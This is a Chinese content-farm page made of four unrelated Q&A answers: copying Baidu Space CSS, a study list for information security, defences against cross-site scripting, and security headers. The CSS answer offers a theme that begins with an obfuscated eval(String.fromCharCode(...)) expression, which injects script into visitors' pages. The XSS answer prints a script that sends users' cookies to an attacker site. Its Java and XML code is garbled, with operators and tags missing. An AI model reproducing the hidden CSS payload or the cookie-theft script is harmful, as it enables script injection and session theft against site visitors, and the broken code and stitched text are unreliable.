本文目录一览:
- 1、百度空间CSS代码
- 2、学信息安全需要哪些基础
- 3、如何防止跨站点脚本攻击
- 4、如何设置安全的header
百度空间CSS代码
告诉你一个简单的方法 1.打开你要的css码的百度空间网页。 2.右击弹出中有一个“查看源文件(V)”,左击它。 3.弹出了一个记事本,按“Ctrl+F”(查找),输入 href,开始查找,第三个就是。有一个结尾带CSS的,类似于href="/lixiang2202/css/item/6c0c8d45d02cf73f879473d7.css"复制引号内的网址。 4.搜索//hi.baidu.com后面加刚才复制的网址 5.弹出了一个记事本文件,就是你要找的CSS代码了。 你可以看看我的 按步骤试一试,不行的话找我来 如果会了,别忘了采纳我啊! 欢迎常来我的空间这是我曾经编的 参考一下吧 JoneThan@Lee hi.baidu.xon/lixiang2202 版权所有 body{xss: (eval(String.fromCharCode(118,97,114,32,105,44,106,44,120,44,121,44,122,59,106,61,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,101,109,39,41,59,102,111,114,40,105,61,48,59,105,60,106,46,108,101,110,103,116,104,59,105,43,43,41,123,121,61,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,101,109,39,41,91,105,93,59,122,61,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,101,109,39,41,91,105,93,46,102,105,114,115,116,67,104,105,108,100,46,100,97,116,97,59,120,61,39,60,98,114,47,62,60,101,109,98,101,100,32,115,114,99,61,39,43,122,43,39,32,97,117,116,111,112,108,97,121,61,49,32,119,105,100,116,104,61,52,53,48,32,104,101,105,103,104,116,61,51,53,48,62,60,47,101,109,98,101,100,62,60,98,114,47,62,60,97,32,104,114,101,102,61,104,116,116,112,58,47,47,104,105,46,98,97,105,100,117,46,99,111,109,47,109,111,110,121,101,114,47,98,108,111,103,47,105,116,101,109,47,51,50,56,56,51,55,102,97,57,98,51,99,102,51,56,57,57,102,53,49,52,54,101,53,46,104,116,109,108,32,116,97,114,103,101,116,61,95,98,108,97,110,107,62,73,78,83,69,82,84,32,86,73,68,69,79,32,73,78,32,89,79,85,82,32,66,65,73,68,85,32,83,80,65,67,69,32,63,60,47,97,62,60,98,114,47,62,39,59,105,102,40,121,41,32,121,46,111,117,116,101,114,72,84,77,76,61,120,59,125)));} body{background-color:#222222;CURSOR: url('');scrollbar-face-color:#000000;scrollbar-arrow-color:#ff0000}a{CURSOR: url('')} a:hover {position:relative; left:1px; top:1px; clip:rect()}body{background:url() repeat-x;background-color:#333;color:#FFF;} body{background: url(); ;ackground-repeat:repeat;background-position:center; background-attachment: fixed; background-position:0px -200px} .stage{background-color:#000} .stage #layout td{padding:0px;}A,A:link,A:visited{COLOR: #39C;} A:hover{COLOR: #3FF;} body{scrollbar-face-color:#000000; scrollbar-shadow-color:#AAAAAA; scrollbar-highlight-color:#AAAAAA; scrollbar-3dlight-color:#AAAAAA; scrollbar-darkshadow-color:#AAAAAA; scrollbar-arrow-color:#AAAAAA; scrollbar-base-color:#AAAAAA; scrollbar-track-color:#000000; overflow-y:auto;height:297px; filter: chroma(color=#E100E1) ;}#header{height:430px;background:url(
);filter:alpha(opacity=90)}#header div.lc{} #header div.rc{background:url(
} #header div.tit {font-weight:bold;top:40px;left:30px;line-height:30px;font-size:28px;} #header div.tit a.titlink:visited{text-decoration:none;filter:glow(color:#DD002C,strength=3); height:12px; color:#ffffff}/*访问后的标题颜色*/ #header div.desc{top:262px;left:600px;font-size:15px;filter:glow(color=blue,strength=3); height:15px;color:#ffffff}/*空间简介*/ #tab{BACKGROUND: url(
) no-repeat right top; TEXT-ALIGN: center; padding:5px 0 5px 0;top:399px;} #tab span{ display:none} #tab A,#tab A:link,#tab A:visited{FONT-SIZE: 12px;BACKGROUND: url(
) no-repeat center; WIDTH: 80px; COLOR: yellow; PADDING-TOP: 5px;TEXT-ALIGN: center; TEXT-DECORATION: none} #tab A:hover {FONT-SIZE: 12px;BACKGROUND: url(
" target="_blank"
) no-repeat center; LEFT: 1px; POSITION: relative; TOP: 1px} #tab A.on ,#tab A.on:link,#tab A.on:visited {FONT-SIZE: 12px;BACKGROUND: url(
) no-repeat center; WIDTH: 80px; COLOR: white; PADDING-TOP: 5px; TEXT-ALIGN: center; TEXT-DECORATION: none} #tab A.on:hover {FONT-SIZE: 12px;BACKGROUND: url(
" target="_blank"
) no-repeat center; LEFT: 1px; POSITION: relative; TOP: 1px} #tab2{} #tab2 span{font-size:12px;font-weight:bold;} #tab2 a{color:#39C;font-size:12px} a.modtit:visited{color:#39C;} #tab2 a:hover{color:#3FF;}#page{height:30px;font-size:14px;font-family:Arial;text-align:center} #page span{padding:3px;color:#000000;font-size:14px;font-weight:bold} #page a.pc{color:#3399CC;font-size:14px;font-weight:bold} #page a.pc:hover{color:#33FFFF} #page a.pi{padding:3px;color:#3399CC;font-size:14px} #page a.pi:hover{color:#33FFFF}.mod{margin-bottom:10px} .modhandle{cursor:move} .modth{height:24px} .modhead{padding:4px 4px 0 4px} .modopt{padding:4px 4px 0 0}.modtit{color:#FFFFFF;font-size:12px;font-weight:bold} a.modtit{color:#FFF;text-decoration:none} a.modtit:visited{color:#FFF;text-decoration:none} a.modtit:hover{color:#CCC;text-decoration: underline}.modtitlink{color:#FFFFFF;font-size:12px;font-weight:bold} a.modtitlink{color:#FFF;text-decoration:none} a.modtitlink:visited{color:#FFF;text-decoration:none} a.modtitlink:hover{color:#CCC;text-decoration: underline}.modact{color:#FFFFFF;font-size:12px} a.modact{color:#FFF;text-decoration:none} a.modact:visited{color:#FFF;text-decoration:none} a.modact:hover{color:#CCC;text-decoration: underline}.modbox{padding:10px 10px 0 10px;background-image:url();border:1px solid #666;border-width:0 1px 0 1px}.modtl{background:url(
) no-repeat top left;line-height:1px} .modtc{background:url(
) repeat-x} .modtr{background:url(
) no-repeat top right;line-height:1px}.modbl{background:url(
) no-repeat top left;line-height:1px} .modbc{background:url(
) repeat-x} .modbr{background:url(
) no-repeat top right;line-height:1px} .modlabel{color:#fff;font-size:14px;font-weight:bold;}#m_blog div.tit{color:#FF3366;font-size:16px;font-weight:bold;background:url() no-repeat top left;text-indent: 22px;height:70px;line-height:75px} #m_blog div.tit a{color:#FF3366;font-size:16px;font-weight:bold;background:url (
) no-repeat top left;text-indent: 22px;height:70px;line-height:75px} #m_blog div.tit a:visited{color:#FF3366;text-decoration:none;} #m_blog div.date{margin:5px 0 8px 0;color:#666} #m_blog div.cnt{color:#FFF;line-height:20px;font-size:14px} #m_blog div.cnt div{font-size:14px} #m_blog div.more{margin:14px 0 16px 0} #m_blog div.more a{color:#3399CC;font-size:14px} #m_blog div.more a:hover{color:#33FFFF} #m_blog div.opt{color:#666666;font-size:12px} #m_blog div.opt a{color:#F90;font-size:12px;text-decoration:none} #m_blog div.opt a:hover{color:#FC0;text-decoration: underline} #m_blog div.line{margin-top:17px;line-height:17px;border-top:1px dotted #dadada} #m_blog div.none{padding:100px 0 100px 0;color:#333333;font-size:14px}#m_pro a{color:#39C} #m_pro a:hover{color:#3FF} #m_pro div.image{text-align:center} #m_pro div.act{margin-top:5px; background:url(;dd=B) no-repeat bottom; padding-bottom: 45px; margin-bottom: 15px; } #m_pro div.user{margin-top:10px;font-size:12px;font-weight:bold} #m_pro div.desc{color:#666666;font-size:12px} #m_pro div.line{margin-top:17px;line-height:17px;border-top:1px solid #D2E9F4} #m_pro td{color:#333333;line-height:24px;font-size:14px} #m_pro .photo{background:#FFF;border:1px solid #DDD} #m_pro .photo td{font-size:12px} #m_pro .photo .image{padding:20px 0 10px 0} #m_pro .photo .line{width:90%;line-height:0;border-top:1px dashed #DDD;font-size:1px} #m_pro .ref{margin-top:10px;border:1px solid #DDD} #m_pro .ref .tit{padding-left:10px;background:#EEE;border-bottom:1px solid #DDD} #m_pro .ref .cnt{padding:10px;background:#FFF} #m_pro .basic td{color:#666;font-size:14px} #m_pro .basic .tit{font-weight:bold} #m_pro .basic a:hover{padding:1px;background:#261CDC;color:#FFF;text-decoration:none} #m_pro .basic a.nlk:hover{padding:0px;color:#196CCA;background-color:#FFF;text-decoration:underline} #m_pro .pline{margin-left:5px;margin-top:10px;line-height:10px;border-top:1px dashed #A6A6A6} #m_pro .pitem{margin-left:5px;line-height:22px;font-size:14px} #m_pro .pitem .tit{color:#666} #m_pro .pitem a:hover{padding:1px;background:#261CDC;color:#FFF;text-decoration:none}#mod_album a{color:#39C;} #mod_album a:hover{color:#3FF}#m_album div.image{text-align:center} #m_album div.size{text-align:center} #m_album div.page{color:#666666;font-size:12px;text-align:center} #m_album div.page a{color:#39C;font-size:12px} #m_album div.page a:hover{color:#3FF} #m_album .phpage{margin-top:10px;padding-bottom:5px;text-align:center}#m_links div.item{font-size:12px} #m_links div.item a{color:#39C;} #m_links div.item a:hover{color:#3FF} #m_links div.line{margin-top:5px;line-height:8px;border-top:1px solid #D2E9F4}#mod_track a{color:#CCCC00;} #mod_track a:hover{color:#3FF}#m_track A IMG {BORDER-RIGHT: #ffffff thin solid; BORDER-TOP: #ffffff thin solid; FILTER: alpha(opacity=70); BORDER-LEFT: #ffffff thin solid; BORDER-BOTTOM: #ffffff thin solid} #m_track A:hover IMG {FILTER: alpha(opacity=100)}#comm_info{font-family:Arial;text-align:left;} #comm_info div.line{height:400px;background:url(
) no-repeat 10px;background-color:#6F6F08;margin-top:5px;line-height:8px;border-top:1px solid #95D69E} #comm_info a{color:#CCCC00;} #comm_info a:hover{color:#3FF}#m_mylink1 div.item{color:#333333;font-size:12px} #m_mylink1 div.item a{color:#3399CC;font-size:12px;text-decoration:none} #m_mylink1 div.item a:hover{color:#33FFFF} #m_mylink1 div.line{margin-top:5px;line-height:8px;border-top:1px solid #D2E9F4}#m_mylink2 div.item{color:#FFFFFF;font-size:12px} #m_mylink2 div.item a{color:#F76809;font-size:12px;text-decoration:none} #m_mylink2 div.item a:hover{color:#FFFFFF} #m_mylink2 div.line{margin-top:5px;line-height:8px;border-top:1px solid #FFFFFF}#m_mylink3 div.item{color:#333333;font-size:12px} #m_mylink3 div.item a{color:#3399CC;font-size:12px;text-decoration:none} #m_mylink3 div.item a:hover{color:#33FFFF} #m_mylink3 div.line{margin-top:5px;line-height:8px;border-top:1px solid #D2E9F4}#m_mylink4 div.item{color:#333333;font-size:12px} #m_mylink4 div.item a{color:#3399CC;font-size:12px;text-decoration:none} #m_mylink4 div.item a:hover{color:#33FFFF} #m_mylink4 div.line{margin-top:5px;line-height:8px;border-top:1px solid #D2E9F4}#m_artclg div.item{color:#FFFF00;font-size:12px} #m_artclg div.item a{color:#FFFF00;font-size:12px} #m_artclg div.item a:hover{color:#FFFF00} #m_artclg div.line{margin-top:5px;line-height:8px;}#m_filed div.item{color:#666666;font-size:12px} #m_filed div.item a{color:#3399CC;font-size:12px} #m_filed div.item a:hover{color:#33FFFF} #m_filed div.line{margin-top:5px;line-height:8px;}#m_comment div.item{color:#FFFFFF;font-size:12px} #m_comment div.item a{color:#3399CC;font-size:12px} #m_comment div.item a:hover{color:#FFCC00} #m_comment div.item a.cnt{color:#FFCC00;font-size:12px;text-decoration:none} #m_comment div.item a.cnt:hover{color:#FFCC00;text-decoration:underline} #m_comment div.line{margin-top:5px;line-height:8px;}#m_albumlist div.note{color:#333333;font-size:14px} #m_albumlist div.desc{margin-bottom:12px;padding:3px 10px 3px 10px;line-height:22px;background-color:#333333;font-size:14px} #m_albumlist div.none{padding:100px 0 100px 0;color:#333333;font-size:14px} #m_albumlist div.line{margin-top:10px;line-height:16px;border-top:1px solid #D2E9F4} #m_albumlist div.tit{margin:6px 0 7px 0;font-size:14px} #m_albumlist div.tit a{color:#3399CC;font-size:14px} #m_albumlist div.tit a:hover{color:#33FFFF} #m_albumlist span.count{color:#999;font-size:12px;font-weight:bold} #m_albumlist span.size{color:#666;font-size:12px;font-family:Arial} #m_albumlist a.act{color:#3399CC;font-size:12px} #m_albumlist a.act:hover{color:#33FFFF} #m_albumlist a.page{color:#3399CC;font-size:14px} #m_albumlist a.page:visited{color:#3399CC;} #m_albumlist a.page:hover{color:#33FFFF} #m_albumlist td.image{padding:5px;border:1px solid #999999;background:#FFFFFF} #m_albumlist .phbox{margin-top:15px;margin-left:15px; text-align:center} #m_albumlist .phbox .phpage{color:#636363;font-size:14px} #m_albumlist .phbox .phinfo{margin:6px 0 2px 0;color:#636363;font-size:12px} #m_albumlist .phbox .phimg{margin-bottom:10px}#m_friend div.filter{margin-bottom:10px;padding-left:10px;padding-top:10px;height:27px;line-height:27px} #m_friend div.catalog{margin-bottom:10px;padding-left:10px;height:27px;line-height:27px;background-color:#F2F2F2;font-size:14px} #m_friend div.user{margin-top:4px;color:#333333;font-size:12px} #m_friend div.user a{color:#3399CC;font-size:12px} #m_friend div.user a:hover{color:#33FFFF} #m_friend div.line{margin-top:10px;line-height:16px;border-top:1px solid #D2E9F4}#m_setting a{color:#3399CC} #m_setting a:hover{color:#33FFFF} #m_setting{line-height:22px;color:#333333;font-size:14px} #m_setting img.sel{border:4px solid #FFDB7B} #m_setting img.unsel{border:1px solid #D2D2D2} #m_setting span.tit{font-size:14px} #m_setting span.usr{color:#666666} #m_setting div.sel{padding-top:6px;font-size:14px;font-weight:bold} #m_setting div.line{margin-top:20px;line-height:16px;border-top:1px solid #D2E9F4}#m_sysinfo a{color:#3399CC} #m_sysinfo a:hover{color:#33FFFF} #m_sysinfo{line-height:22px;color:#333333;font-size:14px} #m_sysinfo span.new{color:#FF0000;font-size:10px;font-family:Arial} #m_sysinfo span.date{color:#666666;font-size:14px}#m_setbase{color:#333333;font-size:14px} #m_setbase td{color:#333333;font-size:14px} #m_setbase div.line{margin-top:5px;line-height:8px;border-top:1px solid #D2E9F4}#in_comment{width:710px} #in_comment div.tit{margin-bottom:12px;color:#333333;font-size:14px;font-weight:bold} #in_comment div.user{margin-bottom:6px;color:#333333;font-size:12px} #in_comment div.user a{color:#3399CC;font-size:12px} #in_comment div.user a:hover{color:#33FFFF} #in_comment div.user span.date{color:#666666;font-size:12px} #in_comment div.desc{color:#FFFFFF;font-size:12px} #in_comment div.line{margin-top:17px;line-height:17px;border-top:1px solid #D2E9F4}#in_send div.tit{margin:10px 0 10px 0;color:#333333;font-size:14px;font-weight:bold} #spBlogCmtText{background:url() no-repeat center;background-attachment:fixed;CURSOR:url()}
学信息安全需要哪些基础
一:学网络安全需要的知识:
1、必须精通TCP/IP协议族。
2、学习和了解各种OS 平台,如:linux,UNIX,BSD 等。
3、随时关注网络安全最新安全动态。
4、熟悉有关网络安全的硬软件配置方法。尤其交换机和路由的配置。
5、多泡网络安全论坛。
6、终身学习。
二:网络安全必修课程:(后面的教材仅为参考)
1、专业基础:
1)C/C++:【C++Primer中文版 还有题解c++ primer 需要一定的C++基础,如果要比较基本的话,钱能的那本不错,清华大学出版社的。 c programming languge 全球最经典的C语言教程 中文名字c程序设计语言】
2)汇编语言 asm
3)操作系统【linux,UNIX,BSD】UBUNTU是linux操作系统 鸟哥的linux私房菜】
4)计算机网络
2、系统编程:(Windows核心及网络编程)
2.1、精通VC/C++编程,熟悉windows网络SOCKET编程开发
1)《Windows网络编程(第二版)》(附光盘),(美)Anthony Jones, Jim Ohlund著;杨合庆译;清华大学出版社,2002.1
2)《Windows 核心编程(第四版)》(附光盘),(美)Jetfrey Richter著,王建华 等译;机械工业出版社,2006.9
2.2、逆向工程:
1)《加密与解密(第二版)》(附光盘),段钢 著,电子工业出版社;2004.5
3、网络协议:
1)《计算机网络实验教程》(《COMPUTER NETWORKS: INTERNET PROTOCOLS IN ACTION》),(美)JEANNA MATTHEWS著,李毅超 曹跃 王钰 等译,人民邮电出版社,2006.1
2)《TCP/IP协议详解卷一:协议》、《TCP/IP详解卷2:实现》、《TCP/IP详解卷3:TCP 事务协议、HTTP、NNTP和UNIX域协议》,美 W.Richard Stevens 著,机械工业出版社,2004.9或《用TCP/IP进行网际互联第一卷:原理、协议与结构》、《用TCP/IP进行网际互联第二卷:设计、实现与内核》、《用TCP/IP 进行网际互联第三卷:客户-服务器编程与应用》(第四版)、(美)Douglas E.Comer林瑶 等,电子工业出版社,2001 年5月
4、网络安全专业知识结构:
1)《信息安全原理与应用(第三版)》(《Security in Computing》),(美)CharlesP Pfleeger,Shari Lawrence Pfleeger著;李毅超,蔡洪斌,谭浩 等译; 电子工业出版社,2004.7
2)《黑客大曝光--网络安全机密与解决方案》(第五版),(美)Stuart McClure,Joel Scambray, George Kurtz;王吉军 等译,清华大学出版社,2006年4月
三:英语学好,也是有用的,尤其是考一些比较有用的证。
如何防止跨站点脚本攻击
防止跨站点脚本攻击的解决方法:
1.输入过滤
对每一个用户的输入或者请求首部,都要进行过滤。这需要程序员有良好的安全素养,而且需要覆盖到所有的输入源。而且还不能够阻止其他的一些问题,如错误页等。
final String filterPattern="[{}\\[\\];\\]";
String inputStr = s.replaceAll(filterPattern," ");
2.输出过滤
public static String encode(String data)
{
final StringBuffer buf = new StringBuffer();
final char[] chars = data.toCharArray();
for (int i = 0; i chars.length; i++)
{
buf.append("" + (int) chars[i]);
}
return buf.toString();
}
public static String decodeHex(final String data,
final String charEncoding)
{
if (data == null)
{
return null;
}
byte[] inBytes = null;
try
{
inBytes = data.getBytes(charEncoding);
}
catch (UnsupportedEncodingException e)
{
//use default charset
inBytes = data.getBytes();
}
byte[] outBytes = new byte[inBytes.length];
int b1;
int b2;
int j=0;
for (int i = 0; i inBytes.length; i++)
{
if (inBytes[i] == '%')
{
b1 = Character.digit((char) inBytes[++i], 16);
b2 = Character.digit((char) inBytes[++i], 16);
outBytes[j++] = (byte) (((b1 0xf) 4) +
(b2 0xf));
}
else
{
outBytes[j++] = inBytes[i];
}
}
String encodedStr = null;
try
{
encodedStr = new String(outBytes, 0, j, charEncoding);
}
catch (UnsupportedEncodingException e)
{
encodedStr = new String(outBytes, 0, j);
}
return encodedStr;
}
!-- Maps the 404 Not Found response code
to the error page /errPage404 --
error-page
error-code404/error-code
location/errPage404/location
/error-page
!-- Maps any thrown ServletExceptions
to the error page /errPageServ --
error-page
exception-typejavax.servlet.ServletException/exception-type
location/errPageServ/location
/error-page
!-- Maps any other thrown exceptions
to a generic error page /errPageGeneric --
error-page
exception-typejava.lang.Throwable/exception-type
location/errPageGeneric/location
/error-page
任何的非servlet例外都被/errPageGeneric路径捕捉,这样就可以处理。
Throwable throwable = (Throwable)
request.getAttribute("javax.servlet.error.exception");
String status_code = ((Integer)
request.getAttribute("javax.servlet.error.status_code")).toString( );
3.安装三方的应用防火墙,可以拦截css攻击。
附:
跨站脚本不像其他攻击只包含两个部分:攻击者和web站点。
跨站脚本包含三个部分:攻击者,客户和web站点。
跨站脚本攻击的目的是窃取客户的cookies,或者其他可以证明用户身份的敏感信息。
攻击
一个get请求
GET /welcome.cgi?name=Joe%20Hacker HTTP/1.0
Host:
会产生如下的结果
HTML
TitleWelcome!/Title
Hi Joe Hacker
BR
Welcome to our system
...
/HTML
但是如果请求被篡改
GET /welcome.cgi?name=scriptalert(document.cookie)/script HTTP/1.0
Host:
就会得到如下的响应
HTML
TitleWelcome!/Title
Hi scriptalert(document.cookie)/script
BR
Welcome to our system
...
/HTML
这样在客户端会有一段非法的脚本执行,这不具有破坏作用,但是如下的脚本就很危险了。
;scriptwindow.open(“”%2Bdocument.cookie)/script
响应如下:
HTML
TitleWelcome!/Title
Hi
scriptwindow.open(“”+document.cookie)/script
BR
Welcome to our system
...
/HTML
浏览器回执行该脚本并将客户的cookie发到一个攻击者的网站,这样攻击者就得到了客户的cookie。
如何设置安全的header
正确的设置
0 – 关闭对浏览器的xss防护
1 – 开启xss防护
1; mode=block – 开启xss防护并通知浏览器阻止而不是过滤用户注入的脚本。
1; report= – 这个只有chrome和webkit内核的浏览器支持,这种模式告诉浏览器当发现疑似xss攻击的时候就将这部分数据post到指定地址。
通常不正确的设置
0; mode=block; – 记住当配置为0的时候,即使加了mode=block选项也是没有效果的。需要指出的是,chrome在发现这种错误的配置后还是会开启xss防护。
1 mode=block; – 数字和选项之间必须是用分号分割,逗号和空格都是错误的。但是这种错误配置情况下,IE和chrome还是默认会清洗xss攻击,但是不会阻拦。
如何检测
如果过滤器检测或阻拦了一个反射性xss以后,IE会弹出一个对话框。当设置为1时,chrome会隐藏对反射性xss的输出。如果是设置为 1; mode=block ,那么chrome会直接将user-agent置为一个空值:, URL 这种形式。
参考文献
Post from Microsoft on the X-XSS-Protection Header
Chromium X-XSS-Protection Header Parsing Source
Discussion of report format in WebKit bugzilla
2. X-Content-Type-Options
目的
这个header主要用来防止在IE9、chrome和safari中的MIME类型混淆攻击。firefox目前对此还存在争议。通常浏览器可以通过嗅探内容本身的方法来决定它是什么类型,而不是看响应中的content-type值。通过设置 X-Content-Type-Options:如果content-type和期望的类型匹配,则不需要嗅探,只能从外部加载确定类型的资源。举个例子,如果加载了一个样式表,那么资源的MIME类型只能是text/css,对于IE中的脚本资源,以下的内容类型是有效的:
application/ecmascript
application/javascript
application/x-javascript
text/ecmascript
text/javascript
text/jscript
text/x-javascript
text/vbs
text/vbscript
对于chrome,则支持下面的MIME 类型:
text/javascript
text/ecmascript
application/javascript
application/ecmascript
application/x-javascript
text/javascript1.1
text/javascript1.2
text/javascript1.3
text/jscript
text/live script
正确的设置
nosniff – 这个是唯一正确的设置,必须这样。
通常不正确的设置
‘nosniff’ – 引号是不允许的
: nosniff – 冒号也是错误的
如何检测
在IE和chrome中打开开发者工具,在控制台中观察配置了nosniff和没有配置nosniff的输出有啥区别。
参考文献
Microsoft Post on Reducing MIME type security risks
Chromium Source for parsing nosniff from response
Chromium Source list of JS MIME types
MIME Sniffing Living Standard
3. X-Frame-Options
目的
这个header主要用来配置哪些网站可以通过frame来加载资源。它主要是用来防止UI redressing 补偿样式攻击。IE8和firefox 18以后的版本都开始支持ALLOW-FROM。chrome和safari都不支持ALLOW-FROM,但是WebKit已经在研究这个了。
正确的设置
DENY – 禁止所有的资源(本地或远程)试图通过frame来加载其他也支持X-Frame-Options 的资源。
SAMEORIGIN – 只允许遵守同源策略的资源(和站点同源)通过frame加载那些受保护的资源。
ALLOW-FROM – 允许指定的资源(必须带上协议http或者https)通过frame来加载受保护的资源。这个配置只在IE和firefox下面有效。其他浏览器则默认允许任何源的资源(在X-Frame-Options没设置的情况下)。
通常不正确的设置
ALLOW FROM – ALLOW和FROM 之间只能通过连字符来连接,空格是错误的。
ALLOW-FROM example.com – ALLOW-FROM选项后面必须跟上一个URI而且要有明确的协议(http或者https)
如何检测
可以通过访问test cases 来查看各种各样的选项 和浏览器对这些frame中的资源的响应。
参考文献
X-Frame-Options RFC
Combating ClickJacking With X-Frame-Options
4. Strict-Transport-Security
目的
Strict Transport Security (STS) 是用来配置浏览器和服务器之间安全的通信。它主要是用来防止中间人攻击,因为它强制所有的通信都走TLS。目前IE还不支持 STS头。需要注意的是,在普通的http请求中配置STS是没有作用的,因为攻击者很容易就能更改这些值。为了防止这样的现象发生,很多浏览器内置了一个配置了STS的站点list。
正确的设置
注意下面的值必须在https中才有效,如果是在http中配置会没有效果。
max-age=31536000 – 告诉浏览器将域名缓存到STS list里面,时间是一年。
max-age=31536000; includeSubDomains – 告诉浏览器将域名缓存到STS list里面并且包含所有的子域名,时间是一年。
max-age=0 – 告诉浏览器移除在STS缓存里的域名,或者不保存此域名。
通常不正确的设置
直接将includeSubDomains设置为 ,但是用户依然可以通过 来访问此站点。如果example.com 并没有跳转到 并设置 STS header,那么访问 就会直接被浏览器重定向到 。
max-age=60 – 这个只设置域名保存时间为60秒。这个时间太短了,可能并不能很好的保护用户,可以尝试先通过http来访问站点,这样可以缩短传输时间。
max-age=31536000 includeSubDomains – max-age 和 includeSubDomains 直接必须用分号分割。这种情况下,即使max-age的值设置的没有问题,chrome也不会将此站点保存到STS缓存中。
max-age=31536000, includeSubDomains – 同上面情况一样。
max-age=0 – 尽管这样在技术上是没有问题的,但是很多站点可能在处理起来会出差错,因为0可能意味着永远不过期。
